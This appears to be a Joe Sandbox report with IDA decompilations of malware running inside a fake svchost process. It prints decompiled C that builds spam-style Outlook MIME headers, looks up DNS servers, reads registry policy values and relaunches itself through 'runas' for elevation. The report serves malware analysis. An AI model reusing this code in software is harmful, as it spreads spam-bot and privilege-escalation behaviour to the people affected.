                                                                                                                                  0x025173f1
                                                                                                                                  0x025173f2
                                                                                                                                  0x025173f4
                                                                                                                                  0x025173f7
                                                                                                                                  0x00000000
                                                                                                                                  0x025173f7
                                                                                                                                  0x02517362
                                                                                                                                  0x02517365
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251736d
                                                                                                                                  0x02517370
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517372
                                                                                                                                  0x02517375
                                                                                                                                  0x0251737a
                                                                                                                                  0x0251737c
                                                                                                                                  0x0251738d
                                                                                                                                  0x02517393
                                                                                                                                  0x02517395
                                                                                                                                  0x02517397
                                                                                                                                  0x02517397
                                                                                                                                  0x02517395
                                                                                                                                  0x0251739d
                                                                                                                                  0x025173a0
                                                                                                                                  0x025173a2
                                                                                                                                  0x025173a4
                                                                                                                                  0x025173a4
                                                                                                                                  0x025173a6
                                                                                                                                  0x025173a9
                                                                                                                                  0x025173b2
                                                                                                                                  0x025173b8
                                                                                                                                  0x025173b9
                                                                                                                                  0x025173bc
                                                                                                                                  0x025173c4
                                                                                                                                  0x025173ca
                                                                                                                                  0x025173cb
                                                                                                                                  0x025173cd
                                                                                                                                  0x00000000
                                                                                                                                  0x02517311
                                                                                                                                  0x02517314
                                                                                                                                  0x0251731a
                                                                                                                                  0x0251731d
                                                                                                                                  0x02517326
                                                                                                                                  0x0251732c
                                                                                                                                  0x0251732d
                                                                                                                                  0x00000000
                                                                                                                                  0x0251732d
                                                                                                                                  0x0251730f
                                                                                                                                  0x025172d0
                                                                                                                                  0x025172d6
                                                                                                                                  0x00000000
                                                                                                                                  0x0251728e
                                                                                                                                  0x02517291
                                                                                                                                  0x02517297
                                                                                                                                  0x0251729a
                                                                                                                                  0x025172a3
                                                                                                                                  0x025172a9
                                                                                                                                  0x025172aa
                                                                                                                                  0x025172aa
                                                                                                                                  0x025172ac
                                                                                                                                  0x025172af
                                                                                                                                  0x025172b2
                                                                                                                                  0x025171cb
                                                                                                                                  0x025171cf
                                                                                                                                  0x025171cf
                                                                                                                                  0x0251728c
                                                                                                                                  0x02517208
                                                                                                                                  0x0251720e
                                                                                                                                  0x02517212
                                                                                                                                  0x0251721b
                                                                                                                                  0x02517221
                                                                                                                                  0x02517224
                                                                                                                                  0x00000000
                                                                                                                                  0x02517224
                                                                                                                                  0x0251713d
                                                                                                                                  0x02517142
                                                                                                                                  0x02517143
                                                                                                                                  0x02517145
                                                                                                                                  0x0251715e
                                                                                                                                  0x02517166
                                                                                                                                  0x0251716b
                                                                                                                                  0x00000000
                                                                                                                                  0x0251716b
                                                                                                                                  0x0251714b
                                                                                                                                  0x02517154
                                                                                                                                  0x0251715a
                                                                                                                                  0x0251715c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251715c
                                                                                                                                  0x025171b2
                                                                                                                                  0x00000000
                                                                                                                                  0x025171b2

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000101,761B43E0,?,761B43E0,00000000), ref: 025170C2
                                                                                                                                  • RegEnumValueA.ADVAPI32 ref: 0251719E
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0,?,761B43E0,00000000), ref: 025171B2
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 02517208
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 02517291
                                                                                                                                  • ___ascii_stricmp.LIBCMT ref: 025172C2
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 025172D0
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 02517314
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0251738D
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 025173D8
                                                                                                                                    • Part of subcall function 0251F1A5: lstrlenA.KERNEL32(000000C8,000000E4,025222F8,000000C8,02517150,?), ref: 0251F1AD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                                                                  • String ID: $"
                                                                                                                                  • API String ID: 4293430545-3817095088
                                                                                                                                  • Opcode ID: 55d292ca7f21405bf0968e235df08aa1c3f6380728fc541ecc038196b8a5bdee
                                                                                                                                  • Instruction ID: 51f4905a52b6ff92bdaa923a4f5d72c76113e9f50b3239dee54882fa27231389
                                                                                                                                  • Opcode Fuzzy Hash: 55d292ca7f21405bf0968e235df08aa1c3f6380728fc541ecc038196b8a5bdee
                                                                                                                                  • Instruction Fuzzy Hash: D3B1837184421AAEFF159FA4DC45BEEBBB9FF48300F100566F911E6090EB719A84CF68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251AD89 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 121timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E0251AD89(void* __ecx, void* __eflags) {
				signed int _t48;
				signed int _t50;
				void* _t53;
				intOrPtr _t55;
				void* _t76;
				signed int _t77;
				void* _t81;
				CHAR* _t92;
				void* _t94;
				void* _t96;
				void* _t98;

				_t76 = __ecx;
				_t94 = _t96 - 0x74;
				GetLocalTime(_t94 + 0x50);
				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
				E0251EE2A(_t76, _t94 - 0x110, 0, 0x80);
				E0251AD08(_t94 - 0x110);
				_t98 = _t96 - 0x184 + 0x10;
				if(E025130B5() == 0) {
					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
				} else {
					_push(_t94 - 0x90);
					 *((intOrPtr*)(_t94 + 0x6c)) = E0251A7A3(_t47, _t47);
				}
				_t48 = E0251ECA5();
				_t77 = 0xe;
				_t50 = E0251ECA5();
				_t92 = "%OUTLOOK_BND_";
				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
				_t53 = E0251EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				while(1) {
					_t103 = _t53;
					if(_t53 == 0) {
						break;
					}
					_t55 = E0251EDAC(_t53 + 0xd);
					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
					__eflags = _t81;
					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
					E0251EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
					_t98 = _t98 + 0x40;
					_t53 = E0251EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				}
				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
				E0251EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
				return E0251EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
			}














                                                                                                                                  0x0251ad89
                                                                                                                                  0x0251ad8a
                                                                                                                                  0x0251ad98
                                                                                                                                  0x0251ada6
                                                                                                                                  0x0251adba
                                                                                                                                  0x0251adc6
                                                                                                                                  0x0251adcb
                                                                                                                                  0x0251add5
                                                                                                                                  0x0251adeb
                                                                                                                                  0x0251add7
                                                                                                                                  0x0251addd
                                                                                                                                  0x0251ade6
                                                                                                                                  0x0251ade6
                                                                                                                                  0x0251adf5
                                                                                                                                  0x0251adfe
                                                                                                                                  0x0251ae03
                                                                                                                                  0x0251ae0f
                                                                                                                                  0x0251ae18
                                                                                                                                  0x0251ae1b
                                                                                                                                  0x0251ae7f
                                                                                                                                  0x0251ae81
                                                                                                                                  0x0251ae83
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ae31
                                                                                                                                  0x0251ae3f
                                                                                                                                  0x0251ae3f
                                                                                                                                  0x0251ae43
                                                                                                                                  0x0251ae4f
                                                                                                                                  0x0251ae5e
                                                                                                                                  0x0251ae6e
                                                                                                                                  0x0251ae73
                                                                                                                                  0x0251ae7a
                                                                                                                                  0x0251ae7a
                                                                                                                                  0x0251aea5
                                                                                                                                  0x0251aeb6
                                                                                                                                  0x0251aedc

                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0251AD98
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0251ADA6
                                                                                                                                    • Part of subcall function 0251AD08: gethostname.WS2_32(?,00000080), ref: 0251AD1C
                                                                                                                                    • Part of subcall function 0251AD08: lstrlenA.KERNEL32(00000000), ref: 0251AD60
                                                                                                                                    • Part of subcall function 0251AD08: lstrlenA.KERNEL32(00000000), ref: 0251AD69
                                                                                                                                    • Part of subcall function 0251AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0251AD7F
                                                                                                                                    • Part of subcall function 025130B5: gethostname.WS2_32(?,00000080), ref: 025130D8
                                                                                                                                    • Part of subcall function 025130B5: gethostbyname.WS2_32(?), ref: 025130E2
                                                                                                                                  • wsprintfA.USER32 ref: 0251AEA5
                                                                                                                                    • Part of subcall function 0251A7A3: inet_ntoa.WS2_32(?), ref: 0251A7A9
                                                                                                                                  • wsprintfA.USER32 ref: 0251AE4F
                                                                                                                                  • wsprintfA.USER32 ref: 0251AE5E
                                                                                                                                    • Part of subcall function 0251EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0251EF92
                                                                                                                                    • Part of subcall function 0251EF7C: lstrlenA.KERNEL32(?), ref: 0251EF99
                                                                                                                                    • Part of subcall function 0251EF7C: lstrlenA.KERNEL32(00000000), ref: 0251EFA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                                                                  • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                                                                  • API String ID: 3631595830-1816598006
                                                                                                                                  • Opcode ID: 87f34d37e3a7451126e97ce5d55559a067c694b1b95800e99af6a1869318d825
                                                                                                                                  • Instruction ID: 8d66bd6b0051b70399246d62ce8ddb11db673df6229470a49fadbf884361d335
                                                                                                                                  • Opcode Fuzzy Hash: 87f34d37e3a7451126e97ce5d55559a067c694b1b95800e99af6a1869318d825
                                                                                                                                  • Instruction Fuzzy Hash: 48413DB290021DABEF25AFA0CC46EEE3BADFB59300F14041ABD1592191EA71D558CF68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02512DF2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 97memorylibrarynetworkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                  			E02512DF2(intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v28;
				short _v30;
				char _v32;
				struct HINSTANCE__* _t18;
				void* _t22;
				signed int _t23;
				short _t27;
				signed int _t31;
				intOrPtr* _t35;
				intOrPtr* _t37;
				CHAR* _t38;
				void* _t40;

				_t38 = "iphlpapi.dll";
				_t18 = GetModuleHandleA(_t38);
				if(_t18 == 0 || _t18 == 0xffffffff) {
					_t18 = LoadLibraryA(_t38);
				}
				if(_t18 == 0 || _t18 == 0xffffffff) {
					L18:
					return 0;
				} else {
					_t35 = GetProcAddress(_t18, "GetNetworkParams");
					if(_t35 == 0) {
						goto L18;
					}
					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
					_t33 =  &_v16;
					_v8 = _t22;
					_v16 = 0x4000;
					_t23 =  *_t35(_t22,  &_v16);
					if(_t23 != 0) {
						goto L18;
					}
					_v12 = _v12 & _t23;
					_t37 = _v8 + 0x10c;
					if(_t37 == 0) {
						L17:
						HeapFree(GetProcessHeap(), 0, _v8);
						return _v12;
					} else {
						goto L8;
					}
					do {
						L8:
						_t40 = _t37 + 4;
						if(_t40 == 0) {
							goto L16;
						}
						_t27 = 2;
						_v32 = _t27;
						__imp__#9(0x35);
						_v30 = _t27;
						__imp__#11(_t40);
						_v28 = _t27;
						if(_t27 == 0 || _t27 == 0xffffffff) {
							__imp__#52(_t40);
							if(_t27 == 0) {
								goto L16;
							}
							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
							_v28 = _t27;
							goto L13;
						} else {
							L13:
							if(_t27 != 0 && _t27 != 0xffffffff) {
								_t31 = E02512CEB(_t33,  &_v32, _a4);
								_pop(_t33);
								_v12 = _t31;
								if(_t31 != 0) {
									goto L17;
								}
							}
						}
						L16:
						_t37 =  *_t37;
					} while (_t37 != 0);
					goto L17;
				}
			}


















                                                                                                                                  0x02512dfb
                                                                                                                                  0x02512e01
                                                                                                                                  0x02512e09
                                                                                                                                  0x02512e11
                                                                                                                                  0x02512e11
                                                                                                                                  0x02512e19
                                                                                                                                  0x02512ef1
                                                                                                                                  0x00000000
                                                                                                                                  0x02512e28
                                                                                                                                  0x02512e34
                                                                                                                                  0x02512e38
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512e4f
                                                                                                                                  0x02512e55
                                                                                                                                  0x02512e5a
                                                                                                                                  0x02512e5d
                                                                                                                                  0x02512e60
                                                                                                                                  0x02512e64
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512e6d
                                                                                                                                  0x02512e70
                                                                                                                                  0x02512e76
                                                                                                                                  0x02512ede
                                                                                                                                  0x02512ee6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512e78
                                                                                                                                  0x02512e78
                                                                                                                                  0x02512e78
                                                                                                                                  0x02512e7d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512e81
                                                                                                                                  0x02512e84
                                                                                                                                  0x02512e88
                                                                                                                                  0x02512e8f
                                                                                                                                  0x02512e93
                                                                                                                                  0x02512e99
                                                                                                                                  0x02512e9e
                                                                                                                                  0x02512ea6
                                                                                                                                  0x02512eae
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512eb5
                                                                                                                                  0x02512eb7
                                                                                                                                  0x00000000
                                                                                                                                  0x02512eba
                                                                                                                                  0x02512eba
                                                                                                                                  0x02512ebc
                                                                                                                                  0x02512eca
                                                                                                                                  0x02512ed0
                                                                                                                                  0x02512ed1
                                                                                                                                  0x02512ed6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512ed6
                                                                                                                                  0x02512ebc
                                                                                                                                  0x02512ed8
                                                                                                                                  0x02512ed8
                                                                                                                                  0x02512eda
                                                                                                                                  0x00000000
                                                                                                                                  0x02512e78

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(iphlpapi.dll,7620EA30,?,000DBBA0,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512E01
                                                                                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512E11
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 02512E2E
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512E4C
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512E4F
                                                                                                                                  • htons.WS2_32(00000035), ref: 02512E88
                                                                                                                                  • inet_addr.WS2_32(?), ref: 02512E93
                                                                                                                                  • gethostbyname.WS2_32(?), ref: 02512EA6
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512EE3
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,02512F0F,?,025120FF,02522000), ref: 02512EE6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                                                                  • String ID: GetNetworkParams$iphlpapi.dll
                                                                                                                                  • API String ID: 929413710-2099955842
                                                                                                                                  • Opcode ID: 2ed21206c85c5f46379c3694fccb8505ad8dff234ef599e45ed4f3b75b1685e9
                                                                                                                                  • Instruction ID: d262c70d4fc8422470d854649a911eba9bfa1e73e89d7deb229b0aa2ec2d4b23
                                                                                                                                  • Opcode Fuzzy Hash: 2ed21206c85c5f46379c3694fccb8505ad8dff234ef599e45ed4f3b75b1685e9
                                                                                                                                  • Instruction Fuzzy Hash: D531D335E4122AABEB209FB89C44B7E7BB8BF16324F150615ED14E72C0D730C5459B5C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02519326 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 284registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                  			E02519326(void* __ecx, void* __edx) {
				void* __ebx;
				char _t88;
				void* _t89;
				int _t92;
				void* _t96;
				signed int _t97;
				signed int _t100;
				signed int _t103;
				char* _t106;
				char* _t111;
				signed int _t112;
				char* _t116;
				signed int _t117;
				int _t119;
				void* _t146;
				signed int _t155;
				int _t161;
				signed int _t165;
				signed int _t167;
				void* _t168;
				void* _t170;
				void* _t172;
				void* _t173;
				void* _t175;
				void* _t176;

				_t146 = __ecx;
				_t168 = _t170 - 0x60;
				E02511910(0x19bc);
				 *(_t168 - 0x58) = 0x9c;
				if(GetVersionExA(_t168 - 0x58) == 0) {
					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
					_t9 = _t168 + 0x58;
					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
					__eflags =  *_t9;
				} else {
					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
				}
				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
				if(_t88 == 0) {
					 *(_t168 - 0x15c) = _t88;
				}
				_push( *((intOrPtr*)(_t168 + 0x70)));
				_t89 = _t168 - 0x15c;
				if( *(_t168 + 0x78) == 0) {
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_t92 = wsprintfA(_t168 - 0x95c, E02512544(0x25222f8,  &E02520918, 0xbd, 0xe4, 0xc8));
					_t172 = _t170 + 0x40;
				} else {
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_t92 = wsprintfA(_t168 - 0x95c, E02512544(0x25222f8, 0x25209d8, 0x4d, 0xe4, 0xc8));
					_t172 = _t170 + 0x38;
				}
				 *(_t168 + 0x78) = _t92;
				E0251EE2A(_t146, 0x25222f8, 0, 0x100);
				_t173 = _t172 + 0xc;
				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
					E0251EF00(_t168 - 0x15c, E02516CC9(_t146));
					E0251EF1E(_t168 - 0x15c, E02512544(0x25222f8,  &E0252090C, 0xc, 0xe4, 0xc8));
					_push(_t168 - 0x15c);
					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E02512544(0x25222f8,  &E02520888, 0x82, 0xe4, 0xc8));
					E0251EE2A(_t146, 0x25222f8, 0, 0x100);
					_t173 = _t173 + 0x50;
				}
				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
				 *(_t168 + 0x5c) = E02516EDD();
				if( *(_t168 + 0x58) < 0x60) {
					_t165 =  *(_t168 + 0x78);
					_t161 = 0;
					__eflags = 0;
					L33:
					__eflags =  *(_t168 + 0x5c) - _t161;
					if( *(_t168 + 0x5c) == _t161) {
						L38:
						_push(_t168 - 0x95c);
						_push(_t161);
						L39:
						_t96 = E025191EB();
						__eflags =  *0x2522180 - _t161; // 0x0
						if(__eflags != 0) {
							 *0x2522180 =  *0x2522180 | _t165;
							__eflags =  *0x2522180;
						}
						__eflags = _t96 - 0x2a;
						_t81 = _t96 == 0x2a;
						__eflags = _t81;
						_t97 = 0 | _t81;
						L42:
						return _t97;
					}
					_t100 = E02511820(_t168 + 0x54, _t168 + 0x78);
					__eflags = _t100;
					if(_t100 != 0) {
						_push(_t168 - 0x95c);
						_push("runas");
						goto L39;
					}
					_t103 =  *(_t168 + 0x78) | 0x5e0d0000;
					__eflags = _t103;
					 *0x2522180 = _t103;
					 *0x252217c =  *(_t168 + 0x54);
					if(_t103 != 0) {
						 *0x2522180 = _t103 | _t165;
					}
					L31:
					_t97 = 0;
					goto L42;
				}
				 *(_t168 + 0x4c) = 4;
				 *(_t168 + 0x44) = 5;
				 *(_t168 + 0x48) = 1;
				_t106 = E02512544(0x25222f8,  &E0252084C, 0x3a, 0xe4, 0xc8);
				_t175 = _t173 + 0x14;
				if(RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50) == 0) {
					_t111 = E02512544(0x25222f8, 0x2520830, 0x1b, 0xe4, 0xc8);
					_t176 = _t175 + 0x14;
					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c);
					__eflags = _t112;
					if(_t112 == 0) {
						_t116 = E02512544(0x25222f8, 0x2520818, 0x16, 0xe4, 0xc8);
						_t176 = _t176 + 0x14;
						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c);
						__eflags = _t117;
						if(_t117 != 0) {
							 *(_t168 + 0x78) = 0x3000;
						}
					} else {
						 *(_t168 + 0x78) = 0x2000;
					}
					RegCloseKey( *(_t168 + 0x50));
					_t165 =  *(_t168 + 0x78);
				} else {
					_t165 = 0x1000;
				}
				_t161 = 0;
				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
					if( *(_t168 + 0x5c) <= _t161) {
						goto L38;
					}
					_t119 =  *(_t168 - 0x4c);
					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
						 *0x252217c = _t119;
						_t167 = _t165 | 0x5e0d0106;
						__eflags = _t167;
						goto L30;
					} else {
						if(E0251F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
							 *0x252217c = _t161;
							_t167 = _t165 | 0x5e0d0107;
							L30:
							 *0x2522180 = _t167;
							goto L31;
						}
						_t97 = E025118E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
						if(_t97 == _t161) {
							_t155 =  *(_t168 + 0x78) | 0x5e0d0000;
							 *0x2522180 = _t155;
							 *0x252217c =  *(_t168 + 0x5c);
							if(_t155 != 0) {
								 *0x2522180 = _t155 | _t165;
							}
						}
						goto L42;
					}
				} else {
					goto L33;
				}
			}




























                                                                                                                                  0x02519326
                                                                                                                                  0x02519327
                                                                                                                                  0x02519330
                                                                                                                                  0x02519339
                                                                                                                                  0x02519348
                                                                                                                                  0x02519358
                                                                                                                                  0x0251935c
                                                                                                                                  0x0251935c
                                                                                                                                  0x0251935c
                                                                                                                                  0x0251934a
                                                                                                                                  0x02519353
                                                                                                                                  0x02519353
                                                                                                                                  0x02519375
                                                                                                                                  0x0251937d
                                                                                                                                  0x0251937f
                                                                                                                                  0x0251937f
                                                                                                                                  0x0251938c
                                                                                                                                  0x02519394
                                                                                                                                  0x025193a2
                                                                                                                                  0x025193d9
                                                                                                                                  0x025193dc
                                                                                                                                  0x025193dd
                                                                                                                                  0x025193e0
                                                                                                                                  0x025193e3
                                                                                                                                  0x025193e6
                                                                                                                                  0x025193e9
                                                                                                                                  0x025193ec
                                                                                                                                  0x0251940c
                                                                                                                                  0x02519412
                                                                                                                                  0x025193a4
                                                                                                                                  0x025193a4
                                                                                                                                  0x025193a5
                                                                                                                                  0x025193a8
                                                                                                                                  0x025193ab
                                                                                                                                  0x025193ae
                                                                                                                                  0x025193b1
                                                                                                                                  0x025193ce
                                                                                                                                  0x025193d4
                                                                                                                                  0x025193d4
                                                                                                                                  0x0251941d
                                                                                                                                  0x02519420
                                                                                                                                  0x02519425
                                                                                                                                  0x0251942c
                                                                                                                                  0x02519441
                                                                                                                                  0x0251945d
                                                                                                                                  0x0251946b
                                                                                                                                  0x0251948d
                                                                                                                                  0x0251949b
                                                                                                                                  0x025194a0
                                                                                                                                  0x025194a0
                                                                                                                                  0x025194a3
                                                                                                                                  0x025194b0
                                                                                                                                  0x025194b3
                                                                                                                                  0x0251962f
                                                                                                                                  0x02519632
                                                                                                                                  0x02519632
                                                                                                                                  0x02519634
                                                                                                                                  0x02519634
                                                                                                                                  0x02519637
                                                                                                                                  0x0251967b
                                                                                                                                  0x02519681
                                                                                                                                  0x02519682
                                                                                                                                  0x02519683
                                                                                                                                  0x02519683
                                                                                                                                  0x0251968a
                                                                                                                                  0x02519690
                                                                                                                                  0x02519692
                                                                                                                                  0x02519692
                                                                                                                                  0x02519692
                                                                                                                                  0x0251969a
                                                                                                                                  0x0251969d
                                                                                                                                  0x0251969d
                                                                                                                                  0x025196a0
                                                                                                                                  0x025196a2
                                                                                                                                  0x025196a9
                                                                                                                                  0x025196a9
                                                                                                                                  0x02519641
                                                                                                                                  0x02519648
                                                                                                                                  0x0251964a
                                                                                                                                  0x02519673
                                                                                                                                  0x02519674
                                                                                                                                  0x00000000
                                                                                                                                  0x02519674
                                                                                                                                  0x02519652
                                                                                                                                  0x02519652
                                                                                                                                  0x02519657
                                                                                                                                  0x0251965c
                                                                                                                                  0x02519662
                                                                                                                                  0x02519666
                                                                                                                                  0x02519666
                                                                                                                                  0x0251962b
                                                                                                                                  0x0251962b
                                                                                                                                  0x00000000
                                                                                                                                  0x0251962b
                                                                                                                                  0x025194ce
                                                                                                                                  0x025194d5
                                                                                                                                  0x025194dc
                                                                                                                                  0x025194e3
                                                                                                                                  0x025194e8
                                                                                                                                  0x025194f9
                                                                                                                                  0x0251951a
                                                                                                                                  0x0251951f
                                                                                                                                  0x02519526
                                                                                                                                  0x0251952c
                                                                                                                                  0x0251952e
                                                                                                                                  0x02519551
                                                                                                                                  0x02519556
                                                                                                                                  0x0251955d
                                                                                                                                  0x02519563
                                                                                                                                  0x02519565
                                                                                                                                  0x02519567
                                                                                                                                  0x02519567
                                                                                                                                  0x02519530
                                                                                                                                  0x02519530
                                                                                                                                  0x02519530
                                                                                                                                  0x02519571
                                                                                                                                  0x02519577
                                                                                                                                  0x025194fb
                                                                                                                                  0x025194fb
                                                                                                                                  0x025194fb
                                                                                                                                  0x0251957a
                                                                                                                                  0x0251957f
                                                                                                                                  0x0251958d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02519597
                                                                                                                                  0x0251959a
                                                                                                                                  0x0251961a
                                                                                                                                  0x0251961f
                                                                                                                                  0x0251961f
                                                                                                                                  0x00000000
                                                                                                                                  0x025195a3
                                                                                                                                  0x025195c0
                                                                                                                                  0x0251960c
                                                                                                                                  0x02519612
                                                                                                                                  0x02519625
                                                                                                                                  0x02519625
                                                                                                                                  0x00000000
                                                                                                                                  0x02519625
                                                                                                                                  0x025195d1
                                                                                                                                  0x025195db
                                                                                                                                  0x025195e7
                                                                                                                                  0x025195ed
                                                                                                                                  0x025195f3
                                                                                                                                  0x025195f9
                                                                                                                                  0x02519601
                                                                                                                                  0x02519601
                                                                                                                                  0x025195f9
                                                                                                                                  0x00000000
                                                                                                                                  0x025195db
